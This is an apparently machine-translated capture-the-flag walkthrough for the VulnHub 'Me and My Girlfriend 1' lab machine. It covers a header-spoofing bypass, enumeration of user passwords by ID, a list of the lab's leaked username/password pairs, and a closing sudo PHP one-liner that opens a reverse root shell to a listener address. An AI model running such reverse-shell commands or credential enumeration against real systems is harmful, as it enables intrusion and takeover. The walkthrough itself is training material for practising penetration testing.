Drone link:
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Host Scan:
HTTP directory access, suggesting no authority, right source code, you can prompt XXF
Normal access, a user registration, login, and then view user profile, traverse enumerate the user password by id
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty !!!
abdikasepak dorrrrr
sundatea Indonesia
alice 4lic3
pentest pentest
Note login through web, found no upload point
Then try to log in via ssh
Mention the right to operate
sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
OVER !!